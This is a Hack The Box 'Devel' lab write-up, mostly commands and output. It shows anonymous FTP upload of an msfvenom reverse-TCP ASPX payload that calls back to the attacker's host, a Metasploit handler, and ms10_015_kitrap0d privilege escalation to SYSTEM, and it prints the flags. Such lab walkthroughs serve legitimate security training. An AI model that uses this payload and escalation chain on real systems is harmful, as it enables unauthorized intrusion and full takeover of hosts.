Devel HTB Write-up

Machine IP - 10.10.10.5

Initial Phase

Starting with an nmap scan, we get the following -

root@kali:~/Desktop/Hack The Box/devel# nmap -F 10.10.10.5 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 09:17 +04 Nmap scan report for 10.10.10.5 Host is up (0.22s latency). Not shown: 98 filtered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 7.88 seconds

This gives 2 services to go on and to put an nmap full scan in the background.

The website shows the following landing page -

Meanwhile, the complete scan of all ports reveals the same result as the fast scan. Therefore, these two services are the only ones we can go on.

A uniscan on the IP address reveals along with a dirb scan reveals no outcome. Dirb basically assures the aspnet server by showing the following result -

root@kali:~/Desktop/Hack The Box/devel# dirb http://10.10.10.5/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Mar 20 09:58:14 2019 URL_BASE: http://10.10.10.5/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.5/ ---- ==> DIRECTORY: http://10.10.10.5/aspnet_client/ ---- Entering directory: http://10.10.10.5/aspnet_client/ ---- ==> DIRECTORY: http://10.10.10.5/aspnet_client/system_web/ ---- Entering directory: http://10.10.10.5/aspnet_client/system_web/ ---- ----------------- END_TIME: Wed Mar 20 10:51:19 2019 DOWNLOADED: 13836 - FOUND: 0

Now, turning to the FTP, we can try anonymous login, which actually works and we get the following -

root@kali:~/Desktop/Hack The Box/devel# ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> pwd 257 "/" is current directory. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 01:06AM <DIR> aspnet_client 03-17-17 04:37PM 689 iisstart.htm 03-17-17 04:37PM 184946 welcome.png 226 Transfer complete. ftp>

This is the same folder where the aspnet files were found by dirb. This directory has a welcome.png file which is likely the IIS 7 image as shown on the web page above. The iisstart.htm should be the default web page of iis. The anonymous ftp seems to have write permissions in the folder. This can be checked as follows -

root@kali:~/Desktop/Hack The Box/devel# cat > hello.html this is a test file for tanq root@kali:~/Desktop/Hack The Box/devel# ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 01:06AM <DIR> aspnet_client 03-17-17 04:37PM 689 iisstart.htm 03-17-17 04:37PM 184946 welcome.png 226 Transfer complete. ftp> put hello.html local: hello.html remote: hello.html 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 30 bytes sent in 0.00 secs (207.7793 kB/s)

Now we can navigate to the file and check if the file has been uploaded and is it rendered by the web server -

Therefore, if we put a file into this folder, we can navigate to that file on the browser. Therefore, we can use an exploit which can give us a reverse shell. This can likely work if the file is an aspx given the type of server. This is done as follows -

root@kali:~/Desktop/Hack The Box/devel# whatweb 10.10.10.5 http://10.10.10.5 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.5], Microsoft-IIS[7.5][Under Construction], Title[IIS7], X-Powered-By[ASP.NET] root@kali:~/Desktop/Hack The Box/devel# msfvenom --list payloads | grep windows | grep meterpreter | grep reverse_tcp windows/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker windows/meterpreter/reverse_tcp_allports Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly) windows/meterpreter/reverse_tcp_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker windows/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker ... ... ...

Therefore, we can use the first payload that is listed.

root@kali:~/Desktop/Hack The Box/devel# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.68 LPORT=4444 -f aspx > develtanq.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of aspx file: 2798 bytes

Now we can log onto the FTP again and get the reverse shell by putting the file on the web server directory and navigating to it while keeping the listener listening.

root@kali:~/Desktop/Hack The Box/devel# ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put develtanq.aspx local: develtanq.aspx remote: develtanq.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 2834 bytes sent in 0.00 secs (22.3365 MB/s)

Now we can keep a listener open and run the aspx file by navigating to it at http://10.10.10.5/develtanq.aspx.

root@kali:~/Desktop/Hack The Box/devel# msfconsole -q msf5 > msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 10.10.14.68 LHOST => 10.10.14.68 msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.10.14.68:4444 [*] Sending stage (179779 bytes) to 10.10.10.5 [*] Meterpreter session 1 opened (10.10.14.68:4444 -> 10.10.10.5:49162) at 2019-03-23 17:39:32 +0400 meterpreter > sysinfo Computer : DEVEL OS : Windows 7 (Build 7600). Architecture : x86 System Language : el_GR Domain : HTB Logged On Users : 0 Meterpreter : x86/windows meterpreter >

Now we get the meterpreter shell of the machine. We can use the exploit suggest from here.

root@kali:~/Desktop/Hack The Box/devel# msfconsole -q msf5 > search suggest Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/server/icmp_exfil normal No ICMP Exfiltration Service exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free exploit/windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester post/osx/gather/enum_colloquy normal No OS X Gather Colloquy Enumeration

Here, the post recon local exploit suggest can be used. Therefore, we run this at the meterpreter shell.

meterpreter > run post/multi/recon/local_exploit_suggester [*] 10.10.10.5 - Collecting local exploits for x86/windows... [*] 10.10.10.5 - 29 exploit checks are being tried... [+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

We see the following suggested exploits and can try these one by one. Trying the first one -

meterpreter > background [*] Backgrounding session 1... msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_eventvwr msf5 exploit(windows/local/bypassuac_eventvwr) > show options Module options (exploit/windows/local/bypassuac_eventvwr): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Windows x86 msf5 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/bypassuac_eventvwr) > exploit [*] Started reverse TCP handler on 192.168.72.128:4444 [-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module [*] Exploit completed, but no session was created. msf5 exploit(windows/local/bypassuac_eventvwr) > show options Module options (exploit/windows/local/bypassuac_eventvwr): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.72.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows x86 msf5 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.10.14.68 LHOST => 10.10.14.68 msf5 exploit(windows/local/bypassuac_eventvwr) > set LPORT 4445 LPORT => 4445 msf5 exploit(windows/local/bypassuac_eventvwr) > exploit [*] Started reverse TCP handler on 10.10.14.68:4445 [-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module [*] Exploit completed, but no session was created.

This exploit did not work therefore, trying the next exploit, we can do the following -

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d msf5 exploit(windows/local/ms10_015_kitrap0d) > show options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 5 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.68 yes The listen address (an interface may be specified) LPORT 4445 yes The listen port Exploit target: Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86) msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0 LHOST => tun0 msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 4448 LPORT => 4448 msf5 exploit(windows/local/ms10_015_kitrap0d) > run [*] Started reverse TCP handler on 10.10.14.68:4448 [*] Launching notepad to host the exploit... [+] Process 3820 launched. [*] Reflectively injecting the exploit DLL into 3820... [*] Injecting exploit into 3820 ... [*] Exploit injected. Injecting payload into 3820... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (179779 bytes) to 10.10.10.5 [*] Meterpreter session 8 opened (10.10.14.68:4448 -> 10.10.10.5:49163) at 2019-03-23 18:10:26 +0400 meterpreter > shell [-] Unknown command: shell. meterpreter > sessions -i 8 meterpreter > shell Process 2680 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami nt authority\system c:\windows\system32\inetsrv>cd ../../.. cd ../../.. c:\>cd Users cd Users c:\Users>dir dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of c:\Users 18/03/2017 01:16 �� <DIR> . 18/03/2017 01:16 �� <DIR> .. 18/03/2017 01:16 �� <DIR> Administrator 17/03/2017 04:17 �� <DIR> babis 18/03/2017 01:06 �� <DIR> Classic .NET AppPool 14/07/2009 09:20 �� <DIR> Public 0 File(s) 0 bytes 6 Dir(s) 24.478.040.064 bytes free c:\Users>cd babis\Desktop cd babis\Desktop c:\Users\babis\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of c:\Users\babis\Desktop 18/03/2017 01:14 �� <DIR> . 18/03/2017 01:14 �� <DIR> .. 18/03/2017 01:18 �� 32 user.txt.txt 1 File(s) 32 bytes 2 Dir(s) 24.478.040.064 bytes free c:\Users\babis\Desktop>type user.txt.txt type user.txt.txt 9ecdd6a3aedf24b41562fea70f4cb3e8 c:\Users\babis\Desktop>cd ../../ cd ../../ c:\Users>cd Administrator\Desktop cd Administrator\Desktop c:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of c:\Users\Administrator\Desktop 18/03/2017 01:17 �� <DIR> . 18/03/2017 01:17 �� <DIR> .. 18/03/2017 01:17 �� 32 root.txt.txt 1 File(s) 32 bytes 2 Dir(s) 24.478.040.064 bytes free c:\Users\Administrator\Desktop>type root.txt.txt type root.txt.txt e621a0b5041708797c4fc4728bc72b4b

That gives us the shell as the root and we can read the user and root files on the system.